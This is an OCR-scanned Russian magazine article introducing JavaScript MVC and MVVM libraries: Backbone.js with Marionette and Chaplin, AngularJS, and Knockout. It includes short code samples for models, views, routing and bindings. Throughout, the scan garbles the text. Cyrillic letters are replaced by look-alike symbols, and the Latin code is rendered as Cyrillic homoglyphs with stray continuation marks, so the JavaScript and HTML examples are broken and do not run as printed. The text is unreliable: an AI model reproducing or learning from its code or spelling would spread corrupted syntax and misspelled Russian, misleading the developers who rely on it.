такукз попул^рноств, что ветераны веб-разработки жалукзтс^ — мол, новички сеичас 
без јОиегу вообше ничего делатв не умекзт. 

С по^влением библиотек на полезнукз работу стало уходитв болвше време- 
ни, а на борвбу с браузером — менвше. А еиде стало пон^тно, что ЈауаЗспр! — әто 
не обертка дгт работы с ООМ и браузером, а вполне себе отделвныи и весвма не- 
плохои при правилвном исполызовании ^зык программировани^, и в сервернои раз- 
работке он бы тоже не помешал (на самом деле серверные реализаиии ЈауаЗспр! 
сушествовали с первого дн^ его по^влени^, но никто про них особо не вспоминал). 
В итоге по^вилс^ проект СоттопЈЗ , иелв которого — распространение ЈауаЗспр!: 
на другие платформы, стандартизаии^ АР1 и создание стандартнои библиотеки. 
И во многом благодар^ әтому проекту сегодн^ суидествукзт такие веиди, как 1\1ос1е.Ј5 
и ВедшгеЈЗ. 

Вскоре после того, как клиентские приложени^ перестали помеидатыз^ на один 
әкран монитора, они стали раздел^тыз^ на компоненты, каждыи из которых отвечал 
за свои функиии и старалс^ не мешатв сосед^м. Обычно части программы, которые 
делакзт разные веиди, имекзт свои зоны ответственности, где совершатв низкоуров- 
невые операиии могут толвко они сами, а взаимодеиствие таких частеи должно осу- 
идествл^тыз^ заранее оговоренным способом. Дл^ того чтобы изолироватв компо- 
ненты друг от друга и физически запретитв доступ в чужие зоны ответственности, 
уже суидествовали широко исполызуемые решени^, такие как пространства имен 
и модификаторы доступа к методам и своиствам обБектов. Так вот: әтих привычных 
конструкиии в ЈауаЗспр! нет, что оп^тв-таки преп^тствовало пр^мому исполызова- 
никз в нем усто^вшихс^ практик построени^ болвших и сложных приложении. 

Параллелвно шла оптимизаии^ ЈауаЗспрЈ-интерпретаторов в браузерах — по^в- 
л^лисв все более быстрые движки, такие как знаменитыи У8 от Өоод1е, и в итоге стало 
возможным перенести частв логики приложении с сервера в браузерныи ЈауаЗспр!:. 
Вот тут уже началосв массовое внедрение на клиенте различных паттернов и прак- 
тик, обкатанных в сервернои разработке. Например, отлично вписалс^ в клиентскукз 
моделв паттерн Мос!е1 — \/Је\л/ — Соп1то11ег, раздел^кзидии все компоненты на предна- 
значенные дгт получени^ и хранени^ данных (Мос!е1), дгт отображени^ данных (\/Је\л/) 
и дгт организаиии взаимодеистви^ и управлени^ другими компонентами (Соп1то11ег). 
По^вилосв множество фреимворков и библиотек, которые позвол^кзт частично или 
полностыо реализоватв әтот подход на клиенте. 

С некоторыми из них мы и решили теб^ познакомитв в әтои статыз. 



^ Ј Васкһопе 




Васкһопе.јз — зто неболвша^ и проста^, но проверенна^ временем М\Л/М (Мос!е1 — 
\/Је\л/ — УЈе\л/Мос!е1) библиотека, которукз давно исполвзукзт множество крупных ком- 
пании. Разработка началасв в кони,е 2010 года, библиотека прошла несколвко стадии 
рефакторинга и год назад получила первукз релизнукз версикз. М\Л/М ^вл^етс^ ар- 
хитектурным подходом дгт св^зывани^ моделеи и представлени^ 
в обе стороны. Изменение состо^ни^ в представлени^хтутже ото- 
бразитс^ в модели, и наоборот. 

Васкоопе.јз предоставл^ет такие модули, как модели, кол- 
лек1дии, представлени^ и событииныи модулв, св^зывакзидии все 
модели воедино, а также модулв роутинга с поддержкои НЈзЈогу 
АР1. Если твое фронтенд-приложение работает в первукз очередв 
с множеством данных, где можно ^вно выделитв модели и собратв 
их в коллек1дии, — Васкоопе.јз будет идеалвным выбором. 



О Васкоопе'овских событи^х ООМ, модуле НЈзЈогу и ЕуепЈз ты можешв уз- 
натв болвше в удобнои документаиии Васкоопе . 



Быстрыи старт 

Дл^ того чтобы написатв неболвшое приложение, достаточно создатв әкземпл^р 
нужного класса Васкоопе.јз и расширитв его. Первое, что нам потребуетс^, — әто 
моделв. 

уәг Воок = Васкоопе.МосЈе! . ех"сепс!({}) ; 

Далвше создадим библиотеку, где будутхранитвс^ все наши книги, и добавим в нее 
нашу книгу: 

уаг И огаг у = Васкропе.Со11ес1:Јоп.ех1:епс1({ 
шос1е1: Воок 

уаг Н огаг у = пеы 1_ јргагу( ) ; 
Пгагу . ас!с1({ 

Ш1е: 'Тһе Рагк Тоыег', 

аи^сһо г: '51:ерһеп Есјыјп КЈп§ ' 

Коллеки,и^ сама создаст моделв и заполнит их данными в своистве агдиплепЈз. Те- 
перв попробуем получитв свежие данные с сервера: 




Ногагу . иг! = '/роокв ' 
Пһгаг у .-Ғе1:с һ() 



Сервер должен ответитв валидным Ј50Ы'ом и об^зателвно массивом (дгт коллек- 
|дии): 



"Јс1" : "334аа7Ө1Ө561с-Ғ2Ө-Ғс1е2с4-Ғс63е1һ82а9с-Ғс183е" , 
"-сј-с1е" : "Тһе Рагк Тоыег", 
"аи1:һог": "51:ерһеп ЕсЫЈп КЈп§ " 

һ 
{ 

"ЈсГ : "9еа598һ6Ө837аӨ6Ө38сааӨ1672һс-Ғ-ҒЗа8331134а" , 
"•ЕгЫе": "Тһе биЈппезз Воок о-Ғ КесогсЈз", 
"аи1:һог": "Ни§һ Веауег" 

Теперв создадим представлени^, чтобы вывести нашу коллеки,икз на әкран. 
уаг И һгагуУЈеы = Васк1зопе.УЈеы.ех1:епс 1({ 



е1: "^һоокз". 



1:а §Мате: "11", 

II Имл класса длл әлемента 
с1а55Маше: "гоы". 



// случае - ипс!ег5соге 

1:етр1а1:е: ' <5рап с!а55="1:Ј-с1е"><%-1:Ј1:1е%>^ 
</5рапхр с!а55="аи1:һог"><%-аи1:һог%></р> ' , 



ЈпЈ-сЈаПге: -Ғипс1:Јоп() { 

•ЕҺЈ^.П^^епТо^-ЕҺЈ^.т осЈе!., "сһап^е", 1:ҺЈ5. гепс1ег ); 

— 1 

}); 

Теперв мы сможем видетв наш список книг, передав коллеки,икз в представление 
и динамически св^зав событи^ между ними. Даваи завернем вызовы в роутинг. 

уаг Ыогк5рас е = Васкһопе. Кои1:ег .ех1:епс 1({ 
гои1:е5: { 
"": "јпс!ех" 

һ 

ЈпсЈех: -Ғипс1:Јоп () { 

уаг Пһга гу = пеы 1Лһгагу( ); 
уаг ујеы = пеш И һгагуУЈеы({ 

со!1ес1 :Јоп: Н һгагу 
}}: 



Пргагу .-Ғе1:сһ(); 



уаг ыогкзрасе = пеы ЫогкзрасеО; 




Васкоопе.јз требует 11пс1ег5СОге.Ј5 и јОиегу/2ер!о в зависимост^х, но, если 
они не нужны в приложении, можешв исполвзоватв ЕхозкеЈеЈоп — форк 
Васкоопе, где никаких зависимостеи нетребуетс^. 



Ех1еп<Ј( Васкһопе) 

Исполвзу^ Васкоопе.јз «как еств», нужно бытв пределвно осторожным. Әто все-таки 
библиотека, а не фреимворк, и она не самодостаточна. В реалвных проектах тебе 
придетс^ строитв поверх нее множество абстраки,ии и обв^зок, а также разрабаты- 
ватв собственнукз архитектуру приложени^, так как библиотека ее не предоставл^ет 
в прин1дипе. У теб^ еств лишв набор базовых суидностеи, но как их св^затв и постро- 
итв приложение — решатв тебе. 

Но и здесв еств готовые решени^ в виде фреимворков, таких как МапопеНе.јз 
и СһарМп.јз . Если Васкоопе позии,ионируетс^ скорее как идеолоп/т и библиотека 
дгт работы с данными в модел^х и коллеки,и^х, то фреимворки на базе Васкоопе. 
јз предоставл^кзт структуру приложени^, определ^кзт подход к архитектуре, предо- 
ставл^ктг руководства к организаи,ии кода. 

МапопеИе.јз ^вл^етс^ модулвным фреимворком (можно исполызоватв толвко 
те его модули, которые нужны, не бо^св потер^тв св^занноств). Модулеи доволв- 
но много, МапопеИе вводиттакие сушности, как приложение, контроллеры, модули 
и субмодули, собственныи роутер, леиауты, отделвные представлени^ дгт коллек- 
|дии и моделеи и пон^тие регионов, а также композитные представлени^ дгт иентра- 
лизованного управлени^ регионами. 

МапопеИе решает главнукз проблему Васкоопе — непроработанноств части пред- 
ставлении. И конечноже, привносит осознаннукз архитектуру приложени^. 

Дл^ МапопеИе.јз написано несколвко книг и присутствует великолепна^ документа- 
и,ш, она оченв расположена к новичкам. 

СһарПп.ј5 — менее известныи, но не менее интересныи МУР/МУС-фреимворк 
наоснове Васкоопе.јз. В отличиеот Мапопе1т.е.Ј5 0н монолитен, предоставл^ет менв- 
шее число модулеи, и исполызоватв их независимо друг от друга нелыз^. Но от зтого 
фреимворк не тер^ет в функ1дионалвности, а даже кое-что приобретает, например 
более четкие соглашени^ внутри приложени^. Каркас и структура приложени^ четко 
регламентированы. Суд^ по графикам на ӨИ:Нио, основна^ разработка завершена 
и проект стабилен. 

Итак, СһарПп.јз предоставл^ет нам следукзидие модули: приложение, модели 
и коллек1дии, роутер, с!Ј5ра1:сһег — загружакзидии и иниииализирукзидии контроллеры, 
тесПаЈог — реализукзидии РиЫЈ5һ/5ио5Сп'ое-паттерн, которыи позвол^ет св^зыватв 
модули событиино, также он хранит и кеширует данные дгт последукзидего много- 
кратного исполызовани^. 

Также СһарПп привносит иелукз группу представлении: 1_ауои1: — представлени^ 



высшего уровн^, управл^ет основными регионами странии,ы, ооИесшп \/1е\л/ и (1тет) 
У\е\м, где представление коллеки,ии может итерироватв в себе лкзбые представле- 
ни^. В каждом представлении можно создатв множество регионов и вкладыватв 
в них необходимые шаблоны. Вообиде в плане решени^ проблемы с представлени- 
^ми СһарИп.јз более конкретныи и св^зныи, нежели Мапопетте.јз, хот^ второи гибче 
и позвол^ет писатв с разными подходами, когда СһарПп.јз четко декларирует подход 
к написаникз приложени^. 

Главна^ иде^ СһарПп.јз — вычиидаемые из пам^ти контроллеры. Фреимворкзато- 
чен на производителвноств и «волшебныи» менеджмент пам^ти. После того как сра- 
батываетроутинг, всеәкземпл^ры представлении, моделеи, коллеки,ии и ихсобыти^, 
втом числе прив^занные к ООМ, аккуратно уничтожакзтс^, высвобожда^ пам^тв. Ко- 
нечно, ты можешв предусмотрителвно сохранитв необходимые об^екты в Сотрозег, 
но все, что не нужно в текуидии момент, удал^етс^, тем самым жизнв браузерного 
сборшика мусора (дагоаде соПестог) становитс^ заметно легче. Такои подход уменв- 
шает количество утечек пам^ти в крупных приложени^х и позвол^- 
ет приложеникз корректно работатв долгое врем^, не отжира^ до- 
полнителвнук) пам^тв. 



Метод Тетсһ инии,иализирует функи,икз Васкоопе.зупс (ты можешв перепи- 
сатв ее дл^ поддержки \/\/ео Зоскетз, например), котора^, в свокз очередв, 
сделает АЈАХ-запрос к серверу по указанному в об^екте коллеки,ии. 



Также у СһарИп.јз еств собственна^ платформа со сборшиком Вгипсһ, которыи 
имеет на борту Во\л/ег.јз, СоТтее5сп'рт (вклкзча^ зоигзе тарз уЗ), СоттопЈЗ-моду- 
ли, собиракзидиес^ в АМО-модули (что особенно полезно тем, кто пишет на 1\1ос!е.Ј5), 
а также С55-препро1дессор 5ту1из (если ты предпочитаешв 5а55, то исполызуи би- 
блиотеку ИҺ5Ә55, написаннукз на С++) и шаблонизатор НапсИеоагз (которыи ты впол- 
не можешв заменитв на быстрыи ЕСТ.јз, лаконичныи Јас!е или привычныи Нат1). 

Выводы 

Васкһопе.Ј5 — доволвно минималистична^ библиотека, котора^ позвол^ет удобно 
работатв с модел^ми, обБедин^тв их в коллеки,ии и предлагает минималвныи функ- 
|дионал дгт их представлени^. Исполвзу^ әту библиотеку в среднем или крупном 
проекте, отдаваи себе отчет в том, что придетс^ оченв многое реализовыватв са- 
мому. И самыи простои выход — исполвзоватв фреимворки на основе Васкоопе — 
Мапопетте.јз или СһарПп.ј5. 





Ш^УМ Апди1аг 





Если ты в последние два-три года следил за трендами в веб-разработке, то навер- 
н^ка в курсе и такого ^влени^, как Апди1аг, тем более в ][ уже как-то была про него 
статыз. Ну а если вдруг почему-то он не попал в поле твоего внимани^, то сеичас са- 



мое врем^ әто исправитв. Даже если заложенна^ во фреимворк философи^ окажет- 
с^ тебе не близка, там еств на что взггтнутв и помимо нее. 

Дзен АпдЫаг 

Собственно, все построено вокруг следукзидих прини,ипов: 

представление (\/Је\л/ в паттерне М\/С) данных описываетс^ де- 
кларативно в разметке странии,ы; 

код, манипулирукзидии представлением (читаи: ООМ), отделен 
от бизнес-логики; 

написание тестов не менее важно, чем написание кода прило- 
жени^; 

простые операи,ии должны делатыз^ просто. 



Если помнитв про зти четыре пункта, то будет пон^тно, почему мно- 
гое в АпдЫаг выггтдит именно так, а не иначе. 



Профилвныи хаб наХабре: доо.д1/пЫ1У1п 



Тренировочное приложение на саите Апди1аг: 
с1ос5.апди1агЈ5.огд/Мопа1 



Гаид по разворачиваникз шаблона приложени^ Апди1аг с помоидвкз 
Үеотап: доо.дЈ/ВТгЗХҒ 



Болыиа^ подборка модулеи дл^ АпдЫаг: пдтосЈЫез.огд 



ВаЈагапд, отличныи отладчик, которыи дополн^ет ОеуТоо15 дгт работы 
с контекстами АпдШаг: доо.д1/701Чп1Јј 



Первые шаги 

Создатели АпдЫаг облегчили начало работы с ним до неприличи^, создав на гитхабе 
шаблон дл^ новых проектов: 

$ § 3.1: с!опе һјјрз : / /§Ј1:һир. сот/ап§и1аг/ап§и1аг-5еес1 
$ ссЈ ап§и1аг -5еес! 
$ прш Јп51:а1 1 

Никаких других глобалвных зависимостеи не требуетс^ — все нужное будет скачано 
и автоматически поставлено с помоидыо прш. После окончани^ установки можно на- 
братв прт 5-саг-с и отправитвс^ лкзбоватвс^ (1оса1һо5^:8000/арр/јпс1ех.һ^т1) на рабо- 
такзидии саит, на котором еств М\/С-роутер с двум^ пустыми страничками. 

Весв код приложени^, отвечакзидии за работу роутера, умеидаетс^ в несколвко 
строчек в /арр/јз/арр.Ј5: 




ап §и1аг .шоаше^ шудрр 9 [ 



] ) . соп^ј§( [ ' $гои1:еРгоуЈс1ег ' 3 ^ипс"сЈоп ($гоитеРгоуЈс1ег) { 
$гои"сеРгоуЈс1е г.мһеп(' /ујем! ' , {± етр1а±еЈЈг 1Ј 'рагЫаЈБ/рагЫаИ.Јтст!', <-■ 
соггсгоПег : 'МуСсгП' }); 

$гои"сеРгоуЈс!е г .ыһеп( ' /ујеш 2 ' у {1:етр1а"сеиг 1: 'рагЫа15/рагЫа12.һ1:т1' , <-■ 
соггсгоИег : 'МуСтг12' }); 

$гои"сеРгоуЈс1ег .о-сһегмЈ5е( {гес1Јгес 1:То: ' /ујеы! ' } ) ; 

Шј 

и одну — в /арр/јпс1ех.һ{т1: 
<с!ју п§-ујеы></с!ју> 

Вкралде: в Ј5-фаиле указано, какои частичныи шаблон представлени^ и с каким кон- 
троллером нужно исполвзоватв в случае изменени^ части урла после хеша, а в тс!ех. 
Һ1:пл1 — в какое место на странии,е его подставитв. Вскз осталвнукз работу на себ^ бе- 
рет внутреннии сервис $гоит_е. Әто, кстати, одно из достоинств Апди1аг: дгт многого 
из того, что почти наверн^ка понадобитс^ при разработке клиентского М\/С-прило- 
жени^ (а именно роутинга, запросов кбәкенду, работы с соокје, 1оса1:Јоп и так далее), 
уже еств готовые решени^, идушие в комплекте с фреимворком. Также присутству- 
кзт свои минималистичные реализаи,ии ргопгпзе и подмножества јОиегу дгт работы 
с ООМ — јд1Ј1е. При әтом если јОиегууже был загружен на странииу до Апди1аг, то ис- 
полвзуетс^ именно он. 

Тев1 а11 1һе 1һшдз! 

Если теперв вернутвс^ в консолв и там набратв прт т_е5т_, то внезапно стартанет 
тест-раннер Кагта и покажет, что код проекта, оказываетс^, уже покрыт кзнит-те- 
стами и они даже все проход^т. Вдумаис^: все уже долго и много говор^т про ТОО, 
а сколвко ты знаешв фреимворков, которые деиствителвно создадут тебе возмож- 
ноств дгт написани^ тестов ранвше кода приложени^? И әто не толвко кзнит-те- 
сты — в комплекте с шаблоном проекта идет обертка над\Л/еоОт/егЈ5 под названием 
Рго.гас.ог дл^ тестировани^ епсМо-епс! си,енариев. По умолчаникз вместе с проектом 
она не ставитс^, как раз потому, что таидит за собои \Л/еоОт/ег (которому нужен еиде 
и ЈОК), — но если возникнет необходимоств, әто исправл^етс^ еиде однои командои 
прт. В обидем, ктестам тут подход^т оченв по-взрослому. 

Еиде одно подтверждение зтому — сама архитектура Јауа5спр1:-части фреимвор- 
ка. Весвкодорганизован вмодули видауаг туМос1и1е = ап§и1аг .тос1и1е( ' туМосШе' , 
[ ' с1ерепс1епсу0пе ' 3 ' сЈерепсЈепсуТмо ' ] ) , у которых еств функи,ии дл^ создани^ раз- 
личных компонентов в әтих модул^х. Все әти функи,ии оформлены, например, таким 
образом: 

шуМосШ е. соп1:го11ег( 'С1:г1№те' , ['с1ер1'. 'сЈер^', 'сЈерЗ', -ҒипстЈоп (сЈер !, <-■ 
дер2, сЈерЗ ) { /* ... */ <-■ 

Во врем^ выполнени^ создаетс^ об^ект 1пјес1:ог, которыи занимаетс^ разрешением 



зависимостеи и подстановкои нужных обБектов в качестве аргументов в функи,ии ком- 
понентов. Все зто называетс^ Оерепс!епсу һјесИоп и давно и с успехом исполызуетс^ 
нашими серверными друзызми. В и,елом оченв похоже на то, что делает ПедшгеЈЗ или 
гедшге в ноде, но отличи^ все же еств — например, в зависимости от типа компонента 
инжектор может передаватв в качестве зависимости либо каждыи раз новыи его әкзем- 
пл^р (дгт контроллеров), либо все врем^ один и тотже (дгт всего осталвного). Ктому 
же в АпдЫаг возможна така^ конструкии^ (выжимка из того самого апдЫаг-зеес!): 

ап §и1аг.тос1и1е( 'шуАрр' , [ 
' туАрр.-ҒЈ11:ег5 ' , 
' туАрр. зегујсез ' , 

ап §и1аг.тос!и1е( 'туАрр. 5егујсе5 ' , [ ] ) . у а!ие( ' уегзЈоп ' , '0.1' ) ; 
ап §и1аг.тосЈи1е( 'туАрр.-ҒЈ11:ег5 ' , [] ) . 

1п11:ег( ' Јп1:егро1а1:е ' , [ ' уег5Јоп ' , -Ғипс1:Јоп (уег5Јо п) { 
ге1:игп -Ғипс1:Јоп( 1:ех1:) { 

ге1:игп 51:гЈп% ("сех"с) . гер1асе(/\%\/ЕК5101\1\%/т§Ј уег^п-оп) ; 

һ 

}]); 

Получаетс^, что, хот^ туАрр.1п11:ег5 исполызует в своих компонентах сервис уег51оп 
(возвраидакзидии просто константу), у него нет пр^мои зависимости от модул^ туАрр . 
5егУ1се5, в котором он определ^етс^, — главное, чтобы в модуле приложени^ они 
повстречалисв. Ведшге такого не допускает, там все жестко. 

Ложка дегтл 

До әтого момента п говорил толвко хорошее — но во фреимворке еств еиде один клк> 
чевои момент, которыи оказалс^ достаточно противоречивым. Әто его декларатив- 
ное оформление представлении с помоидыо директив. То еств в идеологии АпдЫаг 
поверх НТМ1_ по^вл^етс^ свои ОотаЈп-ЗресЈлс 1_апдиаде на основе кастомных атри- 
бутов, тегов и классов, которыи и исполызуетс^ в разметке. Св^зв представлени^ 
с контроллером устанавливаетс^ через контекст (зсоре), которыи обеспечивает дву- 
стороннкзкз прив^зку данных: изменени^ в контексте со стороны контроллера отра- 
жакзтс^ в представлении, а операи,ии полызовател^ со странии,еи мен^кзт состо^ние 
контекста внутри контроллера. 

В обидем-то, лкзбои М\/С-фреимворк делает именно әто — ув^зывает данные 
с представлением. Другои вопрос в том, как он әто делает, — где-то исполызуетс^ 
подписка на событи^ ООМ, а где-то спеииалвные ЈЗ-обвекты дл^ модели. Создате- 
ли Апди1аг пошли по еиде одному пути, которыи называетс^ ОЈг1:у Сһесктд, — на ка- 
ждукз прив^зку контекста к представленикз добавл^етс^ функии^ проверки, котора^ 
вызываетс^ контекстом. С однои стороны, әто позвол^ет значителвно упроститв 
разметку шаблонов и код в директивах, отслеживакзидии изменени^ в контексте. 
С другои же стороны, если функии^ проверки работает медленно (обычно так бы- 
вает, если она делает что-то с ООМ), а әлементов с прив^зками много — или функ- 
ии^ работает быстро, но әлементов с прив^зками оченв много, скажем несколвко 
тыс^ч, — әто может привести к значителвным проблемам с производителвностыо. 



пе I и ч 1 1ЛЈЫ I \ј фс1 1 аЈ I ы~1 ы и иедио I <л илч — в им 1ерме1е ди^ I а I ичми ммиш о1сиси, I <л- 

ких как вот әта: һаогаһаог. ги/розт7200670/ или әта: доо.д!/2Ү948у , где описывакггс^ 
различные методы борвбы с даннои проблемои, — но самым оптималвным реше- 
нием и по сеи денв остаетс^ добавл^тв в контекст толвко те данные, которые пла- 
нируетс^ отобразитв. 

Выводы 

В обидем и и,елом Апди1аг — зто вполне достоиныи фреимворк дгт разработки кли- 
ентских МУС-приложении на ЈауаЗспр!, силвными сторонами которого лвллкзтсл: 

• доступноств базового (и не толвко) функи,ионала без дополнителвных зависимо- 
стеи; 

модулвноств и слаба^ св^занноств компонентов приложении; 

• ориентированноств на написание тестов перед логикои или одновременно с неи; 

• декларативна^ шаблонизаи,и^, которукз можно расшир^тв своими собственными 
директивами; 

• болвшое количество материалов дгт изучени^ и компонентов дл^ исполвзова- 
ни^; 

• обширное и развивакзшеес^ сообидество. 

Хот^, если ты точно знаешв, что в твоем приложении будут быстрые и сложные из- 
менени^ ООМ, или собираешвс^ вставл^тв сотни әлементов в одну странииу, или 
ты пишешв интранет-портал дгт какои-нибудв компании, где все до сих пор полвзу- 
кшт 1Е7, ну или просто считаешв, что Апди1аг не дгт теб^, тогда стоит поискатв что- 
то другое. 





КпоскоиЫЗ 





Кпоскоит предлагаеттебе архитектурныи шаблон М\Л/М (Мос!е1 — \/Је\л/ — \/Је\л/Мос!е1) 
практически такои же, каким его вид^т в\Л/РҒ (\Л/Јпс!о\л/5 РгезепхахЈоп Ғоипс!а1:Јоп), атам 
он выггтдит весвма и весвма привлекателвно! 



Что же в коробке? 

ванилвныи Ј5 (без зависимостеи); 

• 17Кбвд2Јр'е; 

• двустороннее св^зывание данных; 

• декларативные биндинги; 

• 1Е6+. 




КпоскоШ:, хотв и был создан сотрудником Мјсгозоп:, вли^никз корпораи,ии 
зла не подвержен и ^вл^етс^ законным ореп зоигсе с лии,ензиеи М1Т. 



| 

Сама сутв МУ*-паттернов, как, например, Мос!е! — \/Је\л/ — СопЈгоИег (МУС), проста 



и логична — отделение логики от представлени^. Әто помогает держатв код при- 
ложени^ чистым и организованным, облегча^ его поддержку и расширение. Прак- 
тически невозможно долгое врем^ обходитвс^ без МУ* или подобных соглашении 
при разработке достаточно болвшого и сложного приложени^, вот почему ЫУС при- 
шел в ЈауаЗспр., и вот почему М\А/М пришел ему на замену, әволкзи,ионировав та- 
ким образом дгт облегчени^ разработки интерфеисов. Камнем преткновени^ М\А/М 
стало пон^тие св^зывани^ данных, представл^кзидее собои прив^зку данных модели 
к полвзователвскому интерфеису и двустороннкзкз их синхронизаи,икз: мен^ем дан- 
ные в интерфеисе — они автоматически мен^кзтс^ в модели, и наоборот. В МУС по- 
добные св^зи не могут суидествоватв оу-с^езјдп и попытка реализоватв такои функ- 
□.ионал, не выпада^ изобидеи парадигмы, приводит кусложненикз приложени^ из-за 
добавлени^ новых вспомогателвных абстраки,ии. М\Л/М лишен такого недостатка 
благодар^ наличикз \/Је\л/Мос1е1 — текуидего состо^ни^ модели, спроеи,ированного 
на представление и вклкзчакзидего методы их взаимодеистви^. 
Кон1деп1ди^ проиде, чем кажетс^ с первого взггтда, и в зтом можно 
убедитвс^, познакомившисв ближе с Кпоскои!:, что мы и сделаем. 




С помоидыо встроенных биндингов Кпоскои. ты сможешв сделатв многие 
базовые веши, которые нужны в лкзбом приложении, но, конечноже, можно 
создаватв новые с произволыным функиионалом. 



ОиЈск 5*аг1 

Кпоскои!: из коробки не дает нам какукз-либо фаиловукз структуру дл^ проекта 
и не предлагает ее соблкздатв, хот^ дл^ многих разработчиков әтот вопрос важен 
при выборе фреимворка. ^ же склонен считатв әто скорее плкзсом, чем минусом, 
и дл^ того еств основани^. Структура реалвного проекта редко бывает неизменнои, 
и входе сложныхрефакторинговеезачастукз приходитс^ измен^тв, порои кардиналв- 
но. А в әтом случае важно не иметв ограничении со стороны фреимворка. Однако же, 
если ты со мнои не согласен и почему-то хочешв исполвзоватв придуманнукз кем-то 
другим структуру проекта, то советукз обратитв внимание на следукзидие проекты: 

• кпоскои.-атсј-һејрегз — неболыиои плагин от ведуидего контрибвкзтора проекта, 
РаианаНимеиера(Вуап ЫЈетеуег), предлагакзидииАМО-модулидл^ Кпоскои1:-при- 
ложении; 

• Ригапс!а1 — решение дгт создани^ одностраничных приложении, вклкзчакзшее 
јОиегу + Кпоскои* + ПедшгеЈЗ; 

• радегјз — аналогичное ОигапсЈа! решение, став^идее своеи и,ел_>кз помочв тебе 
с организаи,иеи болвшого проекта; 

• ҒаЈсоп.јз — надстроика над Кпоскои., предлагакзидаа свое видение суидностеи 
модели, коллеки,ии и представлени^. 



Со структурои более-менее определилисв? Отлично, идем далвше! 

Какты знаешв, моделв — әто суидноств, представл^кзидаи хранимые данные и опе- 
раи,ии с ними, без прив^зки к конкретному интерфеису. В зависимости от обсто^- 
телвств тебе может понадобитвс^ исполвзоватв в своем приложении такие пон^ти^, 

1/0 1/ гч_1г»оа 1/1 п 1/1 ^апоопиоа и л /~\ п о п 1_ / го\л/ тпНа I \ п г\о п пто п> па и~л 1 1 1 о п п о ы ы мо папоапо 
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БД, которые получает клиент и преобразовывает по своему усмотреникз, например 
дгт удобства работы и лучшего взаимодеистви^ между компонентами. В реалвности 
никто не ограничивает теб^ в создании дополнителвных абстраки,ии, но лишв до тех 
пор, пока сохран^етс^ обшаи иде^ парадигмы М\Л/М. 

Таким образом, Кпоскои!: все равно, что представл^кзт собои твои модели 
и как ты их будешв синхронизироватв, встроенных средств дгт әтого из коробки 
не предоставл^етс^. Единственное требование — получитв на выходе валидныи 
Ј50Ы (точнее, ЈЗ-об^ект), так что не будет плохои практикои вставка данных, необ- 
ходимых дгт инии,иализаи,ии приложени^, даже пр^мо в һеас! внутри тегазспр!. Про- 
сто чтобы не делатв лишнии а^кс-запрос дл^ запуска приложени^. 

<һеас1> 

<5сг јр1:> 

уаг 51:о гес1СзЈ- Ғ1:5 = [ 

{ пате : "Та11 На-Е", ргЈсе: "39.95" } 3 
^пате : "1_оп§ СЈоак", ргЈсе: "120.00" } 

Һ 

</5сгЈр1:> 
</һе ас!> 

Но не забываи, что добавл^тв глобалвные переменные плохо! Не ленисв и исполвзуи 
пространства имен, например \ллпс!о\л/.МуӨЈТС5һор = { 51огес!ӨЈТС5: ... }. 

\/Је\л/ (представлением) в мире Кпоскои! ^вл^етс^ конечныи НТМ1_ (говор^ строго, 
зто ООМ-дерево или его частв), содержашии так называемые биндинги — спеи,иалв- 
ные синтаксические конструки,ии, наход^шиес^ в атрибуте с!а1:а-Ыпс1 әлемента и ука- 
зывакзшие, как именно он должен бытв св^зан с данными из модели. 

^ркии образеи У\е\м из офиииалвного примера Өпс! ес!И:ог ( кпоскоијјз.сот/ 
ехатр1е5/дпс1Ес1Ј1:ог.һ1:т1 ). Он выводит список подарков, частв которого мы описали 
выше, и формирует интерфеис с биндингами дгт его редактировани^. 

<-Ғогт ас1:Јо п= ' /5оте5егуег5Јс1еНапс11ег ' > 

<р>Үои һауе а5кес! -Ғог <5рап (Ја1:а-Ып(ј ='-1:ех-с:§ј-Ғ1:5() .1еп§1:һ' > &пр5р; </5рап ><-< 
6Ј-Ғ-с(5)</р> 

^■саЫе с!а"са- ЫпсЈ=' уЈ5ЈЫе: §Ј-Ғ"С5() .1еп§"сһ > 0'> 
<-сһеас1> 
<1:г> 

^ссһ>е1-Ғ1: пате< /1:һ> 
<1:һ>РгЈсе</1:һ> 

<гһ /> 

<Дг> 
</1:һ еас1> 

<1:рос1у с!а"са-Ыпс1 = ' -Ғогеасһ : §Ј-Ғ"С5'> 
<1:г> 

<1:с1><Јпри1: с!а55= ' гедијгес! ' (Ја1:а-Ыпс1 = ' уа!ие : пате^ ипЈдиеМате :<-■ 
•сгие' / >< /Ј=сЈ > 

<1:с1 >< Јпри1: с!а55=' гедиЈгесЈ питһег' с!а"са-Ыпс1 = ' уа!ие: ргЈсеЈ <-■ 



ипЈдиеМате: тгие' /> < /±с! > 
<тс1><а Һге-Ғ= '#' с!а1 :а-Ыпс1= ' сПск: $гоо1: . гетоуе(зЈ-Ғ1: ' ^ РеЈе^е^ 
</ах/1:с1> 
<Лсг> 
</-срос1у> 
</-саЫе> 



<һи^оп с!а1:а-Ыпс1= 'с1Јск: асШбШ: ' >Ас1с1 6ЈҒЕ</ри-£-Еоп> 

<һи"С"Соп сЈага-Ып(Ј = ' епаЫе : §Ј-Ғ"С5( ) . 1еп§"сһ > Ө' туре= ' виһтЛ: ' > 5иртЈт</рит"Соп> 
</-Ғогт> 

КпоскоиТпредоставл^етболвшои наборвстроенныхбиндингов, раздел^емыхпосво- 
ему назначеникз: 

контролв потока: Тогеасһ, ЈТ, ЈТпоТ, мТҺ; 

контролв внешнего вида и текста: уЈзЈЫе, ТехТ, ҺТпгН, сзз, 5Ту1е, аТТг; 

работа с пол^ми формы и событи^ми: сПск, еуепТ, зиһтЈТ, епаЫе, сПзаЫе, уа1ие, 

һазҒосиз, сһескес!, орТЈопз, 5е1есТес!ОрТЈоп5, игпдиеЫате; 

рендеринг шаблонов: Тетр1аТе. 

Стоит отделвно обратитв внимание на биндинг Тетр1аТе, точнее, на то, что лежит 
за ним. Как ты уже, наверное, догадалс^, он служит дгт вывода резулвтата работы 
шаблонизатора. По умолчаникз в КпоскоиТ еств встроенныи шаблонизатор, которыи 
лежит в основе всех биндингов контрол^ потока, таких как ЈТ или Тогеасһ, но прин- 
|дип работы биндинга позвол^ет тебе исполвзоватв лкзбои строковыи шаблонизатор 
(где на выходе получаетс^ строка с НТМ1_), хот^ дгт әтого и придетс^ написатв не- 
много кода. Пример интеграи,ии 11пс!ег5СОге шаблонизатора с КпоскоиТ: јзТЈсЈсПе.пеТ/ 
г п ј е т еуе Г/1ЧУУ5 Уп / . 

Теперв посмотрим, как выггтдит основна^ частв примера с подарками — его мо- 
делв представлени^. В неи хранитс^ текушии список подарков, которыи был ини- 
и,иализирован данными из нашеи модели и мог бытв изменен полызователем через 
